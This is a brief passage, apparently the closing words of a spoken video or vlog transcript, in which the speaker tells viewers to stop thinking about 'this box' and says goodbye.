and try not to think about this box again. And I will see you guys later.